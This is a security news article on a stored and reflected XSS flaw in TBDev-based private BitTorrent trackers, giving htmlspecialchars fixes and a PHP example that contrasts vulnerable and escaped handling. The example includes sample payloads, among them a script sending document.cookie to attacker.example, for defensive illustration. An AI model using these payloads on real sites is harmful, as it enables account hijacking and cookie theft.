Serious Vulnerability In Private BitTorrent Trackers
Thousands of private BitTorrent trackers built on the popular TBDev code are vulnerable to hostile takeover. According to a security researcher, successful execution of the exploit can give the attacker admin rights on the tracker. Knowledge and a little care can, however, limit the damage. The TBDev flaw comes down to the developers not escaping user-supplied input before echoing it back into pages, which leaves the application, including its administrative pages, open to Cross Site Scripting (XSS).
The TBDev code on which thousands of private trackers are built is said to be vulnerable to a serious exploit. A successful attack lets a malicious user deface the main tracker page (index.php) and hijack the account of anyone who logs into the application, because a persistent (stored) payload runs in the browser of every visitor who views the poisoned page. An administrator's account can also be hijacked through the reflected variant, by social-engineering the admin into clicking a specially crafted hyperlink, although an alert admin is less likely to fall for this. The same reflected attack can be triggered from a website the attacker controls, without the victim ever visiting the tracker first. If you think you might have clicked on a bad link, change your password immediately.
To avoid the reflected version of this exploit, the most important thing to remember is not to click on suspicious links. The link may be disguised, for example with a URL shortener, so the thing to avoid is any link that ultimately lands on the tracker's /redir.php with an attacker-supplied url parameter.
To remove a persistent XSS payload, the administrator may have to log in to the database directly and delete the offending row from the "news" table. The web interface itself cannot be relied on for this, because the payload fires every time the page containing the news posting is rendered, including in the admin's own browser.
A very quick fix is to change, in news.php, '$body = $_POST["body"];' to '$body = htmlspecialchars($_POST["body"], ENT_QUOTES);'. ENT_QUOTES matters because the default mode leaves single quotes alone, which is enough to break out of a single-quoted HTML attribute; passing the charset explicitly (for example 'UTF-8' as the third argument) is also advisable, since older PHP versions default to ISO-8859-1.
The same fix needs to be applied to $_GET["url"] in redir.php, or the administrator account, along with everyone else's, remains open to hijacking. There are other security problems in this application, but the XSS is the most serious, since it allows an immediate attack.
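The following is an added example, not TBDev's own code, showing the two fixes described above side by side with the vulnerable pattern. The names escape_html and safe_redirect_target, the sample payloads, and the http/https scheme check on the redirect target are this example's additions: the article only calls for htmlspecialchars, but escaping alone does not stop a javascript: URL from executing if the value is echoed into an href attribute.

```php
<?php
// Added example, not TBDev's own code. Illustrates the two fixes the article
// describes: escaping the news body (news.php) and the redirect target
// (redir.php). Function names and the scheme check are this example's additions.

// Wrapper around the fix the article gives. ENT_QUOTES also escapes single
// quotes, which matters when a value lands inside a single-quoted attribute;
// the explicit charset avoids PHP's pre-5.4 ISO-8859-1 default.
function escape_html(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// redir.php: besides escaping, only accept http/https targets, since escaping
// alone will not neutralise a "javascript:" URL echoed into an href attribute.
// Returns null when the target should be rejected. (Scheme check is an addition.)
function safe_redirect_target(string $url): ?string {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return escape_html($url);
}

// Constructed payloads of the kind the article describes (not real captures).
$payloads = [
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    "' onmouseover='alert(1)",
    'javascript:alert(document.cookie)',
    'http://example.org/',
];

// news.php, vulnerable: stores exactly what was posted, so the <script> tag
// is later emitted into every reader's page.
$vulnerable_body = $payloads[0];
// news.php, fixed: what is stored (and later echoed) is inert text.
$fixed_body = escape_html($payloads[0]);

echo "vulnerable: $vulnerable_body\n";
echo "fixed:      $fixed_body\n\n";

// redir.php: only the plain http URL survives; the rest are rejected or inert.
foreach ($payloads as $p) {
    $target = safe_redirect_target($p);
    echo str_pad(substr($p, 0, 40), 42), ' => ',
         $target === null ? 'rejected' : $target, "\n";
}
```

Run it with the PHP CLI (php fix_example.php). The second payload shows why ENT_QUOTES matters: with the default flags the single quote would pass through untouched and could close an attribute, whereas here it becomes &#039;. Escaping at the point of output, rather than on the way into the database, is the more robust convention, but the input-side fix above matches what the article recommends and is the smaller change to an existing tracker.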
The full details of the exploit are available here.